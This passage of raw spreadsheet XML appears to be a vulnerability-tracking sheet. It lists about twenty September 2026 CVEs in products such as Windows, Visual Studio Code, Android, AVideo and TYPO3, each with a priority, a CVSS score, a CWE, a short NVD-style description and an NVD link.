r="F796" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G796" s="5" t="inlineStr" /><c r="H796" s="5" t="n"><v>0.002</v></c><c r="I796" s="5" t="inlineStr" /><c r="J796" s="5" t="inlineStr" /><c r="K796" s="5" t="inlineStr" /><c r="L796" s="5" t="inlineStr" /><c r="M796" s="5" t="inlineStr" /><c r="N796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P796" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q796" s="5" t="inlineStr" /><c r="R796" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="S796" s="5" t="inlineStr"><is><t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t></is></c><c r="T796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t></is></c></row><row r="797"><c r="A797" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B797" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C797" s="5" t="inlineStr"><is><t>CVE-2026-81355</t></is></c><c r="D797" s="5" t="n"><v>7.5</v></c><c r="E797" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F797" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G797" s="5" t="inlineStr" /><c r="H797" s="5" t="n"><v>0.002</v></c><c r="I797" s="5" t="inlineStr" /><c r="J797" s="5" t="inlineStr" /><c r="K797" s="5" t="inlineStr" /><c r="L797" s="5" t="inlineStr" /><c r="M797" s="5" t="inlineStr" /><c r="N797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O797" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P797" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q797" s="5" t="inlineStr" /><c r="R797" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S797" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t></is></c></row><row r="798"><c r="A798" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B798" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C798" s="5" t="inlineStr"><is><t>CVE-2026-81381</t></is></c><c r="D798" s="5" t="n"><v>7.5</v></c><c r="E798" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G798" s="5" t="inlineStr" /><c r="H798" s="5" t="n"><v>0.006</v></c><c r="I798" s="5" t="inlineStr" /><c r="J798" s="5" t="inlineStr" /><c r="K798" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L798" s="5" t="inlineStr" /><c r="M798" s="5" t="inlineStr" /><c r="N798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O798" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P798" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q798" s="5" t="inlineStr" /><c r="R798" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S798" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t></is></c></row><row r="799"><c r="A799" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C799" s="5" t="inlineStr"><is><t>CVE-2026-81790</t></is></c><c r="D799" s="5" t="n"><v>7.5</v></c><c r="E799" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F799" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G799" s="5" t="inlineStr" /><c r="H799" s="5" t="n"><v>0.003</v></c><c r="I799" s="5" t="inlineStr" /><c r="J799" s="5" t="inlineStr" /><c r="K799" s="5" t="inlineStr" /><c r="L799" s="5" t="inlineStr" /><c r="M799" s="5" t="inlineStr" /><c r="N799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q799" s="5" t="inlineStr" /><c r="R799" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S799" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t></is></c><c r="T799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t></is></c></row><row r="800"><c r="A800" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C800" s="5" t="inlineStr"><is><t>CVE-2026-83989</t></is></c><c r="D800" s="5" t="n"><v>7.5</v></c><c r="E800" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F800" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G800" s="5" t="inlineStr" /><c r="H800" s="5" t="n"><v>0.008999999999999999</v></c><c r="I800" s="5" t="inlineStr" /><c r="J800" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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00" s="5" t="inlineStr" /><c r="M800" s="5" t="inlineStr" /><c r="N800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P800" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q800" s="5" t="inlineStr" /><c r="R800" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S800" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t></is></c></row><row r="801"><c r="A801" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C801" s="5" t="inlineStr"><is><t>CVE-2026-84001</t></is></c><c r="D801" s="5" t="n"><v>7.5</v></c><c r="E801" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F801" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G801" s="5" t="inlineStr" /><c r="H801" s="5" t="n"><v>0.006</v></c><c r="I801" s="5" t="inlineStr" /><c r="J801" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K80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01" s="5" t="inlineStr" /><c r="M801" s="5" t="inlineStr" /><c r="N801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P801" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q801" s="5" t="inlineStr" /><c r="R801" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S801" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t></is></c></row><row r="802"><c r="A802" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C802" s="5" t="inlineStr"><is><t>CVE-2026-85400</t></is></c><c r="D802" s="5" t="n"><v>7.5</v></c><c r="E802" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F802" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G802" s="5" t="inlineStr" /><c r="H802" s="5" t="n"><v>0.004</v></c><c r="I802" s="5" t="inlineStr" /><c r="J802" s="5" t="inlineStr" /><c r="K802" s="5" t="inlineStr" /><c r="L802" s="5" t="inlineStr" /><c r="M802" s="5" t="inlineStr" /><c r="N802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q802" s="5" t="inlineStr" /><c r="R802" s="5" t="inlineStr"><is><t>CWE-266, CWE-862</t></is></c><c r="S802" s="5" t="inlineStr"><is><t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t></is></c><c r="T802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t></is></c></row><row r="803"><c r="A803" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C803" s="5" t="inlineStr"><is><t>CVE-2026-86075</t></is></c><c r="D803" s="5" t="n"><v>7.5</v></c><c r="E803" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G803" s="5" t="inlineStr" /><c r="H803" s="5" t="n"><v>0.003</v></c><c r="I803" s="5" t="inlineStr" /><c r="J803" s="5" t="inlineStr" /><c r="K803" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L803" s="5" t="inlineStr" /><c r="M803" s="5" t="inlineStr" /><c r="N803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P803" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q803" s="5" t="inlineStr" /><c r="R803" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S803" s="5" t="inlineStr"><is><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is></c><c r="T803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t></is></c></row><row r="804"><c r="A804" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C804" s="5" t="inlineStr"><is><t>CVE-2026-86711</t></is></c><c r="D804" s="5" t="n"><v>7.5</v></c><c r="E804" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F804" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G804" s="5" t="inlineStr" /><c r="H804" s="5" t="n"><v>0.001</v></c><c r="I804" s="5" t="inlineStr" /><c r="J804" s="5" t="inlineStr" /><c r="K804" s="5" t="inlineStr" /><c r="L804" s="5" t="inlineStr" /><c r="M804" s="5" t="inlineStr" /><c r="N804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q804" s="5" t="inlineStr" /><c r="R804" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S804" s="5" t="inlineStr"><is><t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t></is></c><c r="T804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t></is></c></row><row r="805"><c r="A805" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C805" s="5" t="inlineStr"><is><t>CVE-2026-86721</t></is></c><c r="D805" s="5" t="n"><v>7.5</v></c><c r="E805" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G805" s="5" t="inlineStr" /><c r="H805" s="5" t="n"><v>0.003</v></c><c r="I805" s="5" t="inlineStr" /><c r="J805" s="5" t="inlineStr" /><c r="K805" s="5" t="inlineStr" /><c r="L805" s="5" t="inlineStr" /><c r="M805" s="5" t="inlineStr" /><c r="N805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q805" s="5" t="inlineStr" /><c r="R805" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S805" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t></is></c><c r="T805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t></is></c></row><row r="806"><c r="A806" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B806" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C806" s="5" t="inlineStr"><is><t>CVE-2026-86728</t></is></c><c r="D806" s="5" t="n"><v>7.5</v></c><c r="E806" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G806" s="5" t="inlineStr" /><c r="H806" s="5" t="n"><v>0.003</v></c><c r="I806" s="5" t="inlineStr" /><c r="J806" s="5" t="inlineStr" /><c r="K806" s="5" t="inlineStr" /><c r="L806" s="5" t="inlineStr" /><c r="M806" s="5" t="inlineStr" /><c r="N806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q806" s="5" t="inlineStr" /><c r="R806" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S806" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t></is></c><c r="T806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t></is></c></row><row r="807"><c r="A807" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B807" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C807" s="5" t="inlineStr"><is><t>CVE-2026-19651</t></is></c><c r="D807" s="5" t="n"><v>7.4</v></c><c r="E807" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F807" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G807" s="5" t="inlineStr" /><c r="H807" s="5" t="n"><v>0.003</v></c><c r="I807" s="5" t="inlineStr" /><c r="J807" s="5" t="inlineStr" /><c r="K807" s="5" t="inlineStr" /><c r="L807" s="5" t="inlineStr" /><c r="M807" s="5" t="inlineStr" /><c r="N807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O807" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P807" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q807" s="5" t="inlineStr" /><c r="R807" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S807" s="5" t="inlineStr"><is><t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t></is></c><c r="T807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t></is></c></row><row r="808"><c r="A808" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B808" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C808" s="5" t="inlineStr"><is><t>CVE-2026-69347</t></is></c><c r="D808" s="5" t="n"><v>7.4</v></c><c r="E808" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F808" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G808" s="5" t="inlineStr" /><c r="H808" s="5" t="n"><v>0.003</v></c><c r="I808" s="5" t="inlineStr" /><c r="J808" s="5" t="inlineStr" /><c r="K808" s="5" t="inlineStr" /><c r="L808" s="5" t="inlineStr" /><c r="M808" s="5" t="inlineStr" /><c r="N808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O808" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P808" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q808" s="5" t="inlineStr" /><c r="R808" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S808" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t></is></c></row><row r="809"><c r="A809" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B809" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C809" s="5" t="inlineStr"><is><t>CVE-2026-71375</t></is></c><c r="D809" s="5" t="n"><v>7.4</v></c><c r="E809" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F809" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G809" s="5" t="inlineStr" /><c r="H809" s="5" t="n"><v>0.002</v></c><c r="I809" s="5" t="inlineStr" /><c r="J809" s="5" t="inlineStr" /><c r="K809" s="5" t="inlineStr" /><c r="L809" s="5" t="inlineStr" /><c r="M809" s="5" t="inlineStr" /><c r="N809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q809" s="5" t="inlineStr" /><c r="R809" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S809" s="5" t="inlineStr"><is><t>Improper restriction of XML external entity reference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is></c><c r="T809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t></is></c></row><row r="810"><c r="A810" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B810" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C810" s="5" t="inlineStr"><is><t>CVE-2026-76196</t></is></c><c r="D810" s="5" t="n"><v>7.4</v></c><c r="E810" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F810" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G810" s="5" t="inlineStr" /><c r="H810" s="5" t="n"><v>0.002</v></c><c r="I810" s="5" t="inlineStr" /><c r="J810" s="5" t="inlineStr" /><c r="K810" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L810" s="5" t="inlineStr" /><c r="M810" s="5" t="inlineStr" /><c r="N810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O810" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P810" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q810" s="5" t="inlineStr" /><c r="R810" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S810" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t></is></c><c r="T810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t></is></c></row><row r="811"><c r="A811" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B811" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C811" s="5" t="inlineStr"><is><t>CVE-2026-78461</t></is></c><c r="D811" s="5" t="n"><v>7.4</v></c><c r="E811" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F811" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G811" s="5" t="inlineStr" /><c r="H811" s="5" t="n"><v>0.01</v></c><c r="I811" s="5" t="inlineStr" /><c r="J811" s="5" t="inlineStr" /><c r="K811" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L811" s="5" t="inlineStr" /><c r="M811" s="5" t="inlineStr" /><c r="N811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O811" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P811" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q811" s="5" t="inlineStr" /><c r="R811" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S811" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t></is></c></row><row r="812"><c r="A812" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C812" s="5" t="inlineStr"><is><t>CVE-2026-81383</t></is></c><c r="D812" s="5" t="n"><v>7.4</v></c><c r="E812" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G812" s="5" t="inlineStr" /><c r="H812" s="5" t="n"><v>0.007</v></c><c r="I812" s="5" t="inlineStr" /><c r="J812" s="5" t="inlineStr" /><c r="K812" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L812" s="5" t="inlineStr" /><c r="M812" s="5" t="inlineStr" /><c r="N812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P812" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q812" s="5" t="inlineStr" /><c r="R812" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="S812" s="5" t="inlineStr"><is><t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t></is></c></row><row r="813"><c r="A813" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C813" s="5" t="inlineStr"><is><t>CVE-2026-84003</t></is></c><c r="D813" s="5" t="n"><v>7.4</v></c><c r="E813" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G813" s="5" t="inlineStr" /><c r="H813" s="5" t="n"><v>0.004</v></c><c r="I813" s="5" t="inlineStr" /><c r="J813" s="5" t="inlineStr" /><c r="K813" s="5" t="inlineStr"><is><t>microsoft:azure\/msal-node</t></is></c><c r="L813" s="5" t="inlineStr" /><c r="M813" s="5" t="inlineStr" /><c r="N813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P813" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q813" s="5" t="inlineStr" /><c r="R813" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S813" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t></is></c></row><row r="814"><c r="A814" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C814" s="5" t="inlineStr"><is><t>CVE-2026-28613</t></is></c><c r="D814" s="5" t="n"><v>7.3</v></c><c r="E814" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F814" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G814" s="5" t="inlineStr" /><c r="H814" s="5" t="n"><v>0.001</v></c><c r="I814" s="5" t="inlineStr" /><c r="J814" s="5" t="inlineStr" /><c r="K814" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L814" s="5" t="inlineStr" /><c r="M814" s="5" t="inlineStr" /><c r="N814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P814" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q814" s="5" t="inlineStr" /><c r="R814" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S814" s="5" t="inlineStr"><is><t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t></is></c></row><row r="815"><c r="A815" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B815" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C815" s="5" t="inlineStr"><is><t>CVE-2026-28626</t></is></c><c r="D815" s="5" t="n"><v>7.3</v></c><c r="E815" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F815" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G815" s="5" t="inlineStr" /><c r="H815" s="5" t="n"><v>0.001</v></c><c r="I815" s="5" t="inlineStr" /><c r="J815" s="5" t="inlineStr" /><c r="K815" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L815" s="5" t="inlineStr" /><c r="M815" s="5" t="inlineStr" /><c r="N815" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O815" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P815" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q815" s="5" t="inlineStr" /><c r="R815" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S815" s="5" t="inlineStr"><is><t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t></is></c></row><row r="816"><c r="A816" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B816" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C816" s="5" t="inlineStr"><is><t>CVE-2026-28656</t></is></c><c r="D816" s="5" t="n"><v>7.3</v></c><c r="E816" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F816" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G816" s="5" t="inlineStr" /><c r="H816" s="5" t="n"><v>0.001</v></c><c r="I816" s="5" t="inlineStr" /><c r="J816" s="5" t="inlineStr" /><c r="K816" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L816" s="5" t="inlineStr" /><c r="M816" s="5" t="inlineStr" /><c r="N816" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O816" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P816" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q816" s="5" t="inlineStr" /><c r="R816" s="5" t="inlineStr"><is><t>CWE-1021</t></is></c><c r="S816" s="5" t="inlineStr"><is><t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t></is></c></row><row r="817"><c r="A817" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C817" s="5" t="inlineStr"><is><t>CVE-2026-45528</t></is></c><c r="D817" s="5" t="n"><v>7.3</v></c><c r="E817" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F817" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G817" s="5" t="inlineStr" /><c r="H817" s="5" t="n"><v>0.001</v></c><c r="I817" s="5" t="inlineStr" /><c r="J817" s="5" t="inlineStr" /><c r="K817" s="5" t="inlineStr" /><c r="L817" s="5" t="inlineStr" /><c r="M817" s="5" t="inlineStr" /><c r="N817" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P817" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q817" s="5" t="inlineStr" /><c r="R817" s="5" t="inlineStr"><is><t>CWE-926</t></is></c><c r="S817" s="5" t="inlineStr"><is><t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T817" 